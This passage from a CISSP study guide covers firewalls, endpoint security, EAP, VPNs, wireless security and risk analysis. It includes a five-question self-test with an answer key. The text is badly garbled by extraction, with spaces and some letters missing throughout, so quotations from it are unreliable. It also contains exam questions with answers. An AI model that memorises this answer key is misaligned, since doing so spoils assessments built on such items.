MPLS

MultiprotocolLabelSwitching(MPLS)providesawaytoforwardWANdata
vialabels,viaasharedMPLScloudnetwork.Decisionsarebasedonlabels
andnotencapsulatedheaderdata(suchasanIPheader).MPLScancarry
voiceanddataandbeusedtosimplifyWANrouting.

NETWORK DEVICES AND PROTOCOLS

LetuslookatnetworkdevicesrangingfromLayer1hubsthrough
ApplicationLayerProxyrewallsthatoperateuptoLayer7.Manyofthese
networkdevices,suchasrouters,haveprotocolsdedicatedtotheiruse,such
asroutingprotocols.
Repeaters and hubs

Repeaters and hubs

RepeatersandhubsareLayer1devices.Arepeaterreceivesbitsononeport
andrepeatsthemouttheotherport.Therepeaterhasnounderstandingof
protocols;itsimplyrepeatsbits.Repeatersareoftenusedtoextendthelength
ofanetwork.
Ahubisarepeaterwithmorethantwoports.Itreceivesbitsononeportand
repeatsthemacrossallotherports.
Bridges

BridgesandswitchesareLayer2devices.Abridgehastwoportsandconnects
networksegmentstogether.Eachsegmenttypicallyhasmultiplenodes,and
thebridgelearnstheMACaddressesofnodesoneitherside.Tracsentfrom
twonodesonthesamesideofthebridgewillnotbeforwardedacrossthe
bridge.Tracsentfromanodeononesideofthebridgetotheothersidewill
forwardacross.Thebridgeprovidestracisolationandmakesforwarding
decisionsbylearningtheMACaddressesofconnectednodes.Abridgehas
twocollisiondomains.
Switches

Aswitchisabridgewithmorethantwoports.Also,itisbestpracticetoonly
connectonedeviceperswitchport.Otherwise,everythingthatistrueabouta
bridgeisalsotrueaboutaswitch.
Figure2.1showsanetworkswitch.Theswitchprovidestracisolationby
associatingtheMACaddressofeachcomputerandserverwithitsport.

FIGURE2.1 Networkswitch.

Aswitchshrinksthecollisiondomaintoasingleport.Youwillnormallyhave
nocollisionsassumingonedeviceisconnectedperport(whichisbest
practice).
Trunksareusedtoconnectmultipleswitches.
Routers

RoutersareLayer3devicesthatroutetracfromoneLANtoanother.IP
basedroutersmakeroutingdecisionsbasedonthesourceanddestinationIP
addresses.
Firewalls

Firewallsltertracbetweennetworks.TCP/IPpacketlterandstateful
rewallsmakedecisionsbasedonLayers3and4(IPaddressesandports).
ProxyrewallscanalsomakedecisionsbasedonLayers57.Firewallsare
multihomed:theyhavemultipleNICsconnectedtomultipledierent
networks.
Packet filter

Apacketlterisasimpleandfastrewall.Ithasnoconceptofstate:each
lteringdecisionmustbemadeonthebasisofasinglepacket.Thereisno
waytorefertopastpacketstomakecurrentdecisions.

ThepacketlteringrewallshowninFigure2.2allowsoutboundICMPecho
requestsandinboundICMPechoreplies.Computer1canping
bank.example.com.Theproblem:ana ackeratevil.example.comcansend
unsolicitedechoreplies,whichtherewallwillallow.

FIGURE2.2 Packetlterrewalldesign.

Stateful firewalls

Statefulrewallshaveastatetablethatallowstherewalltocomparecurrent
packetstopreviousones.Statefulrewallsareslowerthanpacketlters,but
arefarmoresecure.
Computer1sendsanICMPEchoRequesttobank.example.cominFigure2.3.
TherewallisconguredtoallowpingtoInternetsites,sothestateful
rewallallowsthetracandaddsanentrytoitstatetable.

FIGURE2.3 Statefulrewalldesign.

AnEchoReplyisthenreceivedfrombank.example.comtoComputer1in
Figure2.3.Therewallcheckstoseeifitallowsthistrac(itdoes)andthen

checksthestatetableforamatchingechorequestintheoppositedirection.
Therewallndsthematchingentry,deletesitfromthestatetable,and
passesthetrac.
Thenevil.example.comsendsanunsolicitedICMPechoreply.Thestateful
rewall,showninFigure2.3,seesnomatchingstatetableentryanddenies
thetrac.
Proxy firewalls

Proxiesarerewallsthatactasintermediaryservers.Bothpacketlterand
statefulrewallspasstracthroughordenyit:theyareanotherhopalong
theroute.Proxiesterminateconnections.
Application-Layer Proxy firewalls

ApplicationLayerProxyrewallsoperateuptoLayer7.Unlikepacketlter
andstatefulrewallsthatmakedecisionsbasedonLayers3and4only,
ApplicationLayerproxiescanmakelteringdecisionsbasedonApplication
Layerdata,suchasHTTPtrac,inadditiontoLayers3and4.
Modem

Amodemisamodulator/demodulator.Ittakesbinarydataandmodulatesit
intoanalogsoundthatcanbecarriedonphonenetworksdesignedtocarry
thehumanvoice.Thereceivingmodemthendemodulatestheanalogsound
backintobinarydata.
Intrusion Detection Systems and Intrusion Prevention Systems

AnIntrusionDetectionSystem(IDS)isadetectivedevicedesignedtodetect
malicious(includingpolicyviolating)actions.AnIntrusionPrevention
System(IPS)isapreventivedevicedesignedtopreventmaliciousactions.
TherearetwobasictypesofIDSsandIPSs:networkbasedandhostbased.
Endpoint security

Becauseendpointsarethetargetsofa acks,preventiveanddetective
capabilitiesontheendpointsthemselvesprovidealayerofdefensebeyond
networkcentricsecuritydevices.
Manypointproductscanbeconsideredpartofanoverallendpointsecurity
suite.Themostimportantareantivirus,applicationwhitelisting,removable
mediacontrols,diskencryption,HostIntrusionPreventionSystems,and

desktoprewalls.
Antivirus

Themostcommonlydeployedendpointsecurityproductisantivirus
software.Antivirusisonelayer(ofmany)ofendpointsecuritydefensein
depth.Althoughantivirusvendorsoftenemployheuristicorstatistical
methodsformalwaredetection,thepredominantmeansofdetectingmalware
isstillsignaturebased.
Signaturebasedapproachesrequirethatamalwarespecimenisavailableto
theantivirusvendorforthecreationofasignature.Thisisanexampleof
blacklisting.
Application whitelisting

Applicationwhitelistingisamorerecentadditiontoendpointsecuritysuites.
Theprimaryfocusofapplicationwhitelistingistodetermineinadvance
whichbinariesareconsideredsafetoexecuteonagivensystem.Oncethis
baselinehasbeenestablished,anybinarya emptingtorunthatisnotonthe
listofknowngoodbinariesispreventedfromexecuting.Aweaknessofthis
approachiswhenaknowngoodbinaryisexploitedbyana ackerand
usedmaliciously.
Removable media controls

Anotherrecentendpointsecurityproductassistswithremovablemedia
control.Malwaredeliveryanddataexltrationhavecompelledorganizations
toexertstrictercontroloverwhattypeofremovablemediamaybeconnected.
Removablemediacontrolproductsarethetechnicalcontrolthatmatches
administrativecontrolssuchaspolicymandatesagainstunauthorizeduseof
removablemedia.
Disk encryption

Anotherendpointsecurityproductfoundwithincreasingregularityisdisk
encryptionsoftware.FullDiskEncryption(FDE),alsocalledwholedisk
encryption,encryptsanentiredisk.Thisissuperiortopartiallyencrypted
solutions,suchasencryptedvolumes,directories,folders,orles.The
problemwiththela erapproachistheriskofleavingsensitivedataonan
unencryptedareaofthedisk.

SECURE COMMUNICATIONS

Protectingdatainmotionisoneofthemostcomplexchallengesweface.The
Internetprovidescheapglobalcommunicationwithli leornobuiltin
condentiality,integrity,oravailability.
Authentication protocols and frameworks

Anauthenticationprotocolauthenticatesanidentityclaimoverthenetwork.
Goodsecuritydesignassumesthatanetworkeavesdroppermaysniall
packetssentbetweentheclientandauthenticationserver:theprotocolshould
remainsecure.Aswewillseeshortly,PAPfailsthistest,butCHAPandEAP
pass.
PAP and CHAP

PAP(PasswordAuthenticationProtocol)isaveryweakauthentication
protocol.Itsendstheusernameandpasswordincleartext.Ana ackerwhois
abletosnitheauthenticationprocesscanlaunchasimplereplaya ack,by
replayingtheusernameandpassword,usingthemtologin.PAPisinsecure
andshouldnotbeused.
CHAP(ChallengeHandshakeAuthenticationProtocol)isamoresecure
authenticationprotocolthatdoesnotexposethecleartextpasswordandisnot
susceptibletoreplaya acks.CHAPreliesonasharedsecret:thepassword.
Thepasswordissecurelycreated(suchasduringaccountenrollment)and
storedontheCHAPserver.SinceboththeuserandtheCHAPserversharea
secret(theplaintextpassword),theycanusethatsecrettosecurely
authenticate.
802.1X and EAP

802.1XisPortBasedNetworkAccessControlandincludesEAP(Extensible
AuthenticationProtocol).EAPisanauthenticationframeworkthatdescribes
manyspecicauthenticationprotocols.EAPisdesignedtoprovide
authenticationatLayer2(itisportbased,likeportsonaswitch),beforea
nodereceivesanIPaddress.Itisavailableforbothwiredandwireless,butis
mostcommonlydeployedonWLANs.AnEAPclientiscalledasupplicant,
whichrequestsauthenticationtoaservercalledanauthenticator.

FastFacts

TherearemanytypesofEAP;wewillfocusonLEAP,EAPTLS,EAP
TTLS,andPEAP.
LEAP(LightweightExtensibleAuthenticationProtocol)isaCisco
proprietaryprotocolreleasedbefore802.1Xwasnalized.LEAPhas
signicantsecurityawsandshouldnotbeused.
EAPTLS(EAPTransportLayerSecurity)usesPKI,requiringboth
serversideandclientsidecerticates.EAPTLSestablishesasecureTLS
tunnelusedforauthentication.EAPTLSisverysecureduetotheuseof
PKI,butiscomplexandcostlyforthesamereason.Theothermajor
versionsofEAPa empttocreatethesameTLStunnelwithoutrequiringa
clientsidecerticate.
EAPTTLS(EAPTunneledTransportLayerSecurity),developedby
FunkSoftwareandCerticom,simpliesEAPTLSbydroppingtheclient
sidecerticaterequirement,allowingotherauthenticationmethods(such
aspassword)forclientsideauthentication.EAPTTLSisthuseasierto
deploythanEAPTLS,butlesssecurewhenomi ingtheclientside
certicate.
PEAP(ProtectedEAP)wasjointlydevelopedbyCiscoSystems,
Microsoft,andRSASecurity.Itissimilarto(andmaybeconsidereda
competitorto)EAPTTLS,includingnotrequiringclientsidecerticates.

VPN

VirtualPrivateNetworks(VPNs)securedatasentviainsecurenetworkssuch
astheInternet.Thegoalistoprovidetheprivacyprovidedbyacircuitsuch
asaT1,virtually.ThenutsandboltsofVPNsinvolvesecureauthentication,
cryptographichashessuchasSHA1toprovideintegrity,andcipherssuchas
AEStoprovidecondentiality.
PPP

PPP(PointtoPointProtocol)isaLayer2protocolthataddscondentiality,
integrity,andauthenticationviapointtopointlinks.PPPsupports
synchronouslinks(suchasT1s)inadditiontoasynchronouslinkssuchas

modems.
IPsec

IPv4hasnobuiltincondentiality;higherlayerprotocolssuchasTLSare
usedtoprovidesecurity.ToaddressthislackofsecurityatLayer3,IPsec
(InternetProtocolSecurity)wasdesignedtoprovidecondentiality,integrity,
andauthenticationviaencryptionforbothIPv4andIPv6.IPsecisasuiteof
protocols;themajortwoareEncapsulatingSecurityProtocol(ESP)and
AuthenticationHeader(AH).EachhasanIPprotocolnumber:ESPisprotocol
50;AHisprotocol51.
SSL and TLS

SecureSocketsLayer(SSL)wasdesignedtoprotectHTTP(HypertextTransfer
Protocol)data:HTTPSusesTCPport443.TLS(TransportLayerSecurity)is
thelatestversionofSSL,equivalenttoSSLversion3.1.Thecurrentversionof
TLSis1.2.
ThoughinitiallyWebfocused,SSLorTLSmaybeusedtoencryptmanytypes
ofdataandcanbeusedtotunnelotherIPprotocolstoformVPNconnections.
SSLVPNscanbesimplerthantheirIPsecequivalents:IPsecmakes
fundamentalchangestoIPnetworking,soinstallationofIPsecsoftware
changestheoperatingsystem(whichrequiressuperuserprivileges).SSL
clientsoftwaredoesnotrequirealteringtheoperatingsystem.Also,IPsecis
diculttorewall;SSLismuchsimpler.
VoIP

VoiceoverInternetProtocol(VoIP)carriesvoiceviadatanetworks.VoIP
bringstheadvantagesofpacketswitchednetworks,suchaslowercostand
resiliency,tothetelephone.WiththeadventofVoIP,manyorganizations
haveloweredcostsbycombiningvoiceanddataservicesonpacketswitched
networks.
CommonVoIPprotocolsincludeRealtimeTransportProtocol(RTP),designed
tocarrystreamingaudioandvideo.VoIPprotocolscarriedbyRTPinclude
SIP(SessionInitiationProtocol,asignalingprotocol)andH.323.SRTP(Secure
RealtimeTransportProtocol)maybeusedtoprovidesecureVoIP,including
condentiality,integrity,andsecureauthentication.SRTPusesAESfor
condentialityandSHA1forintegrity.

WhileVoIPcanprovidecompellingcostadvantages(especiallyfornewsites,
withoutalargelegacyvoiceinvestment),therearesecurityconcerns.Many
VoIPprotocols,suchasSIP,provideli leornosecuritybydefault.
Wireless Local Area Networks

WirelessLocalAreaNetworks(WLANs)transmitinformationvia
electromagneticwaves(suchasradio)orlight.Historically,wirelessdata
networkshavebeenveryinsecure,oftenrelyingonthe(perceived)diculty
ina ackingthecondentialityorintegrityofthetrac.Thisperceptionis
usuallymisplaced.Themostcommonformofwirelessdatanetworkingisthe
802.11wirelessstandard,andtherst802.11standardwithreasonable
securityis802.11i.
FHSS, DSSS, and OFDM

FrequencyHoppingSpreadSpectrum(FHSS)andDirectSequenceSpread
Spectrum(DSSS)aretwomethodsforsendingtracviaaradioband.Some
bands,likethe2.4GHzISMband,canbequitepollutedwithinterference:
Bluetooth,somecordlessphones,some802.11wireless,babymonitors,and
evenmicrowavescanbroadcastorinterferewiththisband.BothDSSSand
FHSSaredesignedtomaximizethroughputwhileminimizingtheeectsof
interference.
DSSSusestheentirebandatonce,spreadingthesignalthroughoutthe
band.FHSSusesanumberofsmallfrequencychannelsthroughouttheband
andhopsthroughtheminpseudorandomorder.
OrthogonalFrequencyDivisionMultiplexing(OFDM)isanewer
multiplexingmethod,allowingsimultaneoustransmissionusingmultiple
independentwirelessfrequenciesthatdonotinterferewitheachother.
802.11 abgn

802.11wirelesshasmanystandards,usingvariousfrequenciesandspeeds.
Theoriginalmodeissimplycalled802.11(sometimes802.111997,basedon
theyearitwascreated),whichoperatedat2megabitspersecond(mbps)
usingthe2.4GHzfrequency;itwasquicklysupplantedby802.11b,at11
mbps.802.11gwasdesignedtobebackwardcompatiblewith802.11bdevices,
oeringspeedsupto54mbpsusingthe2.4GHzfrequency.802.11aoersthe
sametopspeed,usingthe5GHzfrequency.

802.11nusesboth2.4and5GHzfrequenciesandisabletousemultiple
antennaswithmultipleinputmultipleoutput(MIMO).Thisallowsspeedsof
144mbpsandbeyond.Table2.3summarizesthemajortypesof802.11
wireless.
Table2.3
Typesof802.11Wireless

WEP

WEPistheWiredEquivalentPrivacyprotocol,anearlya empt(rstratiedin
1999)toprovide802.11wirelesssecurity.WEPhasproventobecritically
weak:newa ackscanbreakanyWEPkeyinminutes.Duetothesea acks,
WEPeectivelyprovidesli leintegrityorcondentialityprotection:WEPis
consideredbrokenanditsuseisstronglydiscouraged.802.11iand/orother
encryptionmethodssuchasVPNshouldbeusedinplaceofWEP.
802.11i

802.11iistherst802.11wirelesssecuritystandardthatprovidesreasonable
security.802.11idescribesaRobustSecurityNetwork(RSN),whichallows
pluggableauthenticationmodules.RSNallowschangestocryptographic
ciphersasnewvulnerabilitiesarediscovered.

CrunchTime
RSNisalsoknownasWPA2(WiFiProtectedAccess2),afull
implementationof802.11i.Bydefault,WPA2usesAESencryptionto
providecondentialityandCCMP(CounterModeCBCMACProtocol)to
createaMessageIntegrityCheck(MIC),whichprovidesintegrity.WPA2
may(optionally)usethelesssecureRC4(RivestCipher4)andTKIP

(TemporalKeyIntegrityProtocol)cipherstoprovidecondentialityand
integrity,respectively.
ThelesssecureWPA(withoutthe2)wasdesignedforaccesspointsthat
lackthepowertoimplementthefull802.11istandard,providingabe er
securityalternativetoWEP.WPAusesRC4forcondentialityandTKIP
forintegrity.UsageofWPA2isrecommendedoverWPA.

Bluetooth

Bluetooth,describedbyIEEEstandard802.15,isaPersonalAreaNetwork
(PAN)wirelesstechnology,operatinginthesame2.4GHzfrequencyasmany
typesof802.11wireless.Bluetoothcanbeusedbysmalllowpowerdevices
suchascellphonestotransmitdataovershortdistances.Bluetoothversions
2.1andolderoperateat3mbpsorless;versions3and4oerfarfaster
speeds.
RFID

RadioFrequencyIdentication(RFID)isatechnologyusedtocreate
wirelesslyreadabletagsforanimalsorobjects.TherearethreetypesofRFID
tags:active,semipassive,andpassive.ActiveandsemipassiveRFIDtagshavea
ba ery;anactivetagbroadcastsasignal;semipassiveRFIDtagsrelyona
RFIDreaderssignalforpower.PassiveRFIDtagshavenoba eryandalso
relyontheRFIDreaderssignalforpower.
Remote access

Inanageoftelecommutingandthemobileworkforce,secureremoteaccessis
acriticalcontrol.Thisincludesconnectingmobileusersviamethodssuchas
DSLorCableModem,securitymechanismssuchascallback,andnewer
concernssuchasinstantmessagingandremotemeetingtechnology.
Remote desktop console access

Manyusersrequireremoteaccesstocomputersconsoles.Naturally,some
formofsecureconduitlikeanIPSecVPN,SSH,orSSLtunnelshouldbeused
toensurecondentialityoftheconnection,especiallyiftheconnection
originatesfromoutsidetheorganization.

Twocommonmodernprotocolsprovidingforremoteaccesstoadesktopare
VirtualNetworkComputing(VNC),whichtypicallyrunsonTCP5900,and
RemoteDesktopProtocol(RDP),whichtypicallyrunsonTCPport3389.
VNCandRDPallowforgraphicalaccessofremotesystems,asopposedto
theolderterminalbasedapproachtoremoteaccess.RDPisaproprietary
Microsoftprotocol.
Increasingly,usersareexpectingeasyaccesstoagraphicaldesktopoverthe
Internetthatcanbeestablishedquicklyandfromanynumberofpersonal
devices.TheseexpectationscanprovedicultwithtraditionalVNCand
RDPbasedapproaches,which,forsecuritypurposes,arefrequentlytunneled
overanencryptedchannelsuchasaVPN.
Arecentalternativetotheseapproachesistouseareversetunnel,which
allowsauserwhoestablishedanoutboundencryptedtunneltoconnectback
inthroughthesametunnel.Thisusuallyrequiresasmallagentinstalledon
theuserscomputerthatwillinitiateanoutboundconnectionusingHTTPS
overTCP443.Thisconnectionwillterminateatacentralserver,whichthe
usercanconnecttofromoutsidetheoceinordertotakecontroloftheir
desktopmachine.
Desktop and application virtualization

Inadditiontoaccessingstandalonedesktopsystemsremotely,another
approachtoprovidingremoteaccesstocomputingresourcesisthrough
desktopandapplicationvirtualization.Desktopvirtualizationisanapproach
thatprovidesacentralizedinfrastructurethathostsadesktopimagethatcan
beremotelyleveragedbytheworkforce.Desktopvirtualizationisoften
referredtoasVDI.
Asopposedtoprovidingafulldesktopenvironment,anorganizationcan
choosetosimplyvirtualizekeyapplicationsthatwillbeservedcentrally.Like
desktopvirtualization,thecentralizedcontrolassociatedwithapplication
virtualizationallowstheorganizationtoemploystrictaccesscontroland
perhapsmorequicklypatchtheapplication.Additionally,application
virtualizationcanalsobeusedtorunlegacyapplicationsthatwould
otherwisebeunabletorunonthesystemsemployedbytheworkforce.
DSL

DigitalSubscriberLine(DSL)hasalastmilesolutionthatusesexisting
copperpairstoprovidedigitalservicetohomesandsmalloces.
CommontypesofDSLareSymmetricDigitalSubscriberLine(SDSL,with
matchinguploadanddownloadspeeds),AsymmetricDigitalSubscriberLine
(ADSL,featuringfasterdownloadspeedsthanupload),andVeryHighRate
DigitalSubscriberLine(VDSL,featuringmuchfasterasymmetricspeeds).
AnotheroptionisHDSL(HighdatarateDSL),whichmatchesSDSLspeeds
usingtwopairsofcopper;HDSLisusedtoprovideinexpensiveT1service.
Asageneralrule,thecloserasiteistotheCentralOce(CO),thefasterthe
availableservice.
Table2.4summarizesthespeedsandmodesofDSL.
Table2.4
DSLSpeedandDistances

DSLandCableModemNetworks.

h p://www.ciscopress.com/articles/article.asp?p=31289[accessedJune26,
2013].

Cable Modems

CableModemsareusedbycableTVproviderstoprovideInternetaccessvia
broadbandcableTV.CableTVaccessisnotubiquitous,butisavailablein
mostlargetownsandcitiesinindustrializedareas.UnlikeDSL,Cable
Modembandwidthistypicallysharedwithneighborsonthesamenetwork
segment.
Instant messaging

Instantmessagingallowstwoormoreuserstocommunicatewitheachother

viarealtimechat.Chatmaybeonetooneormanytomanyviachat
groups.Inadditiontocha ing,mostmoderninstantmessagingsoftware
allowslesharingandsometimesaudioandvideoconferencing.
AnolderinstantmessagingprotocolisIRC(InternetRelayChat),aglobal
networkofchatserversandclientscreatedin1988andremainingvery
populareventoday.OtherchatprotocolsandnetworksincludeAOLInstant
Messenger(AIM),ICQ(shortforIseekyou),andExtensibleMessagingand
PresenceProtocol(XMPP)(formerlyknownasJabber).
Chatsoftwaremaybesubjecttovarioussecurityissues,includingremote
exploitation,andmustbepatchedlikeanyothersoftware.Thelesharing
capabilityofchatsoftwaremayallowuserstoviolatepolicybydistributing
sensitivedocuments,andsimilarissuescanberaisedbytheaudioandvideo
sharingcapabilityofmanyoftheseprograms.
Remote meeting technology

Remotemeetingtechnologyisanewertechnologythatallowsuserstoconduct
onlinemeetingsviatheInternet,includingdesktopsharingfunctionality.
ThesetechnologiesusuallyincludedisplayingPowerPointslidesonallPCs
connectedtoameeting,sharingdocumentssuchasspreadsheets,andalso
sharingaudioorvideo.
ManyofthesesolutionsaredesignedtotunneloutboundSSLorTLStrac,
whichcanoftenpassviarewallsandanyWebproxies.Usageofremote
meetingtechnologiesshouldbeunderstood,controlled,andcompliantwith
allapplicablepolicy.

Summary of exam objectives

TelecommunicationsandNetworkSecurityisalargeandcomplexdomain,
requiringbroadandsometimesdeepunderstandingofthornytechnical
issues.Ourmodernworldreliesonnetworks,andthosenetworksmustbe
keptsecure.Itisimportanttounderstandnotonlywhyweuseconceptslike
packetswitchednetworksandtheOSImodelbutalsohowweimplement
thoseconcepts.
OlderInternetconnectednetworksoftenhadasingledualhomedhost
connectedtotheInternet.Firewallswerecreatedandthenevolvedfrom

packetltertostateful.Ourphysicaldesignevolvedfrombusestostars,
providingfaulttoleranceandhardwareisolation.Wehaveevolvedfromhubs
toswitchesthatprovidetracisolation.Wehaveaddeddetectivedevices
suchasHIDSandNIDSandpreventivedevicessuchasHIPSandNIPS.We
havedeployedsecureprotocolssuchasTLSandIPsec.
Wehaveimprovedournetworkdefenseindeptheverystepofthewayand
increasedthecondentiality,integrity,andavailabilityofournetworkdata.

TOP FIVE TOUGHEST QUESTIONS

1.RestrictingBluetoothdevicediscoveryreliesonthesecrecyofwhat?
A.MACAddress
B.SymmetricKey
C.PrivateKey
D.PublicKey
2.Whichendpointsecuritytechniqueisthemostlikelytopreventa
previouslyunknowna ackfrombeingsuccessful?
A.Signaturebasedantivirus
B.HostIntrusionDetectionSystems(HIDS)
C.Applicationwhitelisting
D.Perimeterrewall
3.WhatisthemostsecuretypeofEAP?
A.EAPTLS
B.EAPTTLS
C.LEAP
D.PEAP

4.Whatisthemostsecuretypeofrewall?
A.Packetlter
B.Statefulrewall
C.CircuitlevelProxyrewall
D.ApplicationLayerProxyrewall
5.AccessinganIPv6networkviaanIPv4networkiscalledwhat?
A.CIDR
B.NAT
C.Translation
D.Tunneling

SELF-TEST QUICK ANSWER KEY

1.Correctanswerandexplanation:A.AnswerAiscorrect;Restricting
Bluetoothdevicediscoveryreliesonthesecrecyofthe48bitBluetoothMAC
address.
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.WhileE0isasymmetriccipher,itnotusedtorestrictdiscovery(itis
usedtoencryptdata).PublicorprivatekeysarealsonotusedforBluetooth
discovery.
2.Correctanswerandexplanation:C.AnswerCiscorrect:Application
whitelistingisthemostlikelytobesuccessfuloftheoptionslisted.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDareall
incorrect.Signaturebasedantivirusismostsuccessfulatpreventingknown
ratherthanunknowna acks.HostIntrusionDetectionSystems(HIDS)do
notpreventa acksfrombeingsuccessful,butrathercanhelpdetectthem.A
perimeterrewallisnotanendpointsecurityproduct.
3.Correctanswerandexplanation:A.AnswerAiscorrect;EAPTLSisthe
mostsecure(andcostly)formofEAPbecauseitrequiresbothserverand
clientsidecerticates.

Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.EAPTTLSandPEAParesimilaranddontrequireclientside
certicates.LEAPisaCiscoproprietaryprotocolthatdoesnotrequireclient
sidecerticates,andalsohasfundamentalsecurityweaknesses.
4.Correctanswerandexplanation:D.AnswerDiscorrect;ApplicationLayer
rewallsarethemostsecure:theyhavetheabilitytolterbasedonOSIlayers
threethroughseven.
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.Allarerewalls.Apacketlteristheleastsecureofthefour,dueto
thelackofstate.Astatefulrewallismoresecurethanapacketlter,butits
decisionsarelimitedtoLayers3and4.CircuitlevelProxyrewallsoperateat
Layer5andcannotlterbasedonapplicationLayerdata.
5.Correctanswerandexplanation:D.AnswerDiscorrect;accessinganIPv6
networkviaanIPv4networkiscalledtunneling.
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.CIDRisClasslessInterdomainRouting,awaytocreateexible
subnets.NATisNetworkAddressTranslation,whichtranslatesoneIP
addressforanother.Translationisadistracteranswer.

CHAPTER3

Domain 3: Information Security G

overnance and Risk Management
Abstract
ThischapterpresentsafundamentaldomaintestedontheCISSP,Domain3:
InformationSecurityGovernanceandRiskManagement.Keyterms,
concepts,andformulasrelatedtoriskmanagementarepresentedwithinthis
chapter.Risk,threat,andvulnerabilityarebasictermsthatmustbe
understoodtoprovesuccessfulwiththisdomain.Understandinghowto
performcalculationsusingAnnualizedLossExpectancy(ALE),SingleLoss
Expectancy(SLE),AnnualizedRateofOccurrence(ARO),andExposure
Factor(EF)ishighlightedaspartofquantitativeriskanalysis.Important
conceptsrelatedtoinformationsecuritygovernancesuchasprivacy,due
care,duediligence,certication,andaccreditationarealsoafocusofthis
chapter.

KEYWORDS
Threat;Vulnerability;Risk;Safeguard;QuantitativeRiskAnalysis;
QualitativeRiskAnalysis;AssetValue(AV);ExposureFactor(EF);SingleLoss
Expectancy(SLE);AnnualRateofOccurrence(ARO);AnnualizedLoss
Expectancy(ALE);TotalCostofOwnership(TCO);ReturnonInvestment
(ROI);Policy;Procedure;Standard;Baseline;Guideline

Exam Objectives in This Chapter

RiskAnalysis
InformationSecurityGovernance

Introduction

Introduction
Ourjobasinformationsecurityprofessionalsistoevaluaterisksagainstour
criticalassetsanddeploysafeguardstomitigatethoserisks.Weworkin
variousroles:rewallengineers,penetrationtesters,auditors,management,
etc.Thecommonthreadisrisk:itispartofourjobdescription.
TheInformationSecurityGovernanceandRiskManagementdomainfocuses
onRiskAnalysisandmitigation.Thisdomainalsodetailssecurity
governanceortheorganizationalstructurerequiredforasuccessful
informationsecurityprogram.Thedierencebetweenorganizationsthatare
successfulversusthosethatfailinthisrealmisusuallynottiedtodollarsor
sizeofsta:itistiedtotherightpeopleintherightroles.Knowledgeableand
experiencedinformationsecuritystawithsupportiveandvestedleadership
isthekeytosuccess.

RISK ANALYSIS
Allinformationsecurityprofessionalsassessrisk:wedoitsooftenthatit
becomessecondnature.AccurateRiskAnalysisisacriticalskillforan
informationsecurityprofessional.Wemustholdourselvestoahigher
standardwhenjudgingrisk.Ourriskdecisionswilldictatewhichsafeguards
wedeploytoprotectourassetsandtheamountofmoneyandresourceswe
spenddoingso.Poordecisionswillresultinwastedmoneyor,evenworse,
compromiseddata.
Assets

Assetsarevaluableresourcesyouaretryingtoprotect.Assetscanbedata,
systems,people,buildings,property,andsoforth.Thevalueorcriticalityof
theassetwilldictatewhatsafeguardsyoudeploy.
Threats and vulnerabilities

Athreatisanythingthatcanpotentiallycauseharmtoanasset.Threats
includeearthquakes,poweroutages,ornetworkbasedworms.
Avulnerabilityisaweaknessthatallowsathreattocauseharm.Examplesof
vulnerabilities(matchingourpreviousthreats)arebuildingsthatarenotbuilt
towithstandearthquakes,adatacenterwithoutproperbackuppower,ora
MicrosoftWindowsXPsystemthathasnotbeenpatchedinafewyears.
Risk=threatvulnerability

Risk=threatvulnerability

Tohaverisk,athreatmustconnecttoavulnerability.Thisrelationshipis
statedbytheformula:

Youcanassignavaluetospecicrisksusingthisformula.Assignanumberto
boththreatsandvulnerabilities.Wewillusearangeof15(therangeis
arbitrary;justkeepitconsistentwhencomparingdierentrisks).
Impact

Therisk=threatvulnerabilityequationsometimesusesanaddedvariable
calledimpact:risk=threatvulnerabilityimpact.Impactistheseverityof
thedamage,sometimesexpressedindollars.
Risk=threatvulnerabilitycostissometimesusedforthatreason.A
synonymforimpactisconsequences.

E x a m Wa r n i n g
Lossofhumanlifehasnearinniteimpactontheexam.Whencalculating
riskusingtherisk=threatvulnerabilityimpactformula,anyrisk
involvinglossofhumanlifeisextremelyhighandmustbemitigated.

Risk Analysis Matrix

TheRiskAnalysisMatrixusesaquadranttomapthelikelihoodofarisk
occurringagainsttheconsequences(orimpact)thatriskwouldhave.
Australia/NewZealandISO31000:2009RiskManagementPrinciplesand
Guidelines(AS/NZSISO31000:2009,see
h p://infostore.saiglobal.com/store/Details.aspx?ProductID=1378670)
describestheRiskAnalysisMatrix,showninTable3.1.

Table3.1
RiskAnalysisMatrix

TheRiskAnalysisMatrixallowsyoutoperformQualitativeRiskAnalysis
(seeSectionQualitativeandQuantitativeRiskAnalysis)basedon
likelihood(fromraretoalmostcertain)andconsequences(orimpact),
frominsignicanttocatastrophic.Theresultingscoresarelow(L),
medium(M),high(H),andextremerisk(E).Lowrisksarehandledvia
normalprocesses,moderaterisksrequiremanagementnotication,highrisks
requireseniormanagementnotication,andextremerisksrequireimmediate
actionincludingadetailedmitigationplan(andseniormanagement
notication).
Thegoalofthematrixistoidentifyhighlikelihood/highconsequencerisks
(upperrightquadrantofTable3.1)anddrivethemdowntolow
likelihood/lowconsequencerisks(lowerleftquadrantofTable3.1).
Calculating Annualized Loss Expectancy

TheAnnualizedLossExpectancy(ALE)calculationallowsyoutodeterminethe
annualcostofalossduetoarisk.Oncecalculated,ALEallowsyoutomake
informeddecisionstomitigatetherisk.
Thissectionwilluseanexampleofriskduetolostorstolenunencrypted
laptops.Assumeyourcompanyhas1000laptopsthatcontainPersonally
IdentiableInformation(PII).Youarethesecurityocer,andyouare
concernedabouttheriskofexposureofPIIduetolostorstolenlaptops.You
wouldliketopurchaseanddeployalaptopencryptionsolution.Thesolution
isexpensive,soyouneedtoconvincemanagementthatthesolutionis
worthwhile.
Asset Value

Asset Value

TheAssetValue(AV)isthevalueoftheassetyouaretryingtoprotect.Inthis
example,eachlaptopcosts$2500,buttherealvalueisthePII.Theftof
unencryptedPIIhasoccurredpreviouslyandhascostthecompanymany
timesthevalueofthelaptopinregulatorynes,badpublicity,legalfees,sta
hoursspentinvestigating,etc.ThetrueaverageAssetValueofalaptopwith
PIIforthisexampleis$25,000($2500forthehardwareand$22,500forthe
exposedPII).
Tangibleassets(suchascomputersorbuildings)arestraightforwardto
calculate.Intangibleassetsaremorechallenging.Forexample,whatisthe
valueofbrandloyalty?AccordingtoDeloi e,therearethreemethodsfor
calculatingthevalueofintangibleassets,marketapproach,incomeapproach,
andcostapproach:
MarketApproach:Thisapproachassumesthatthefairvalueofanasset
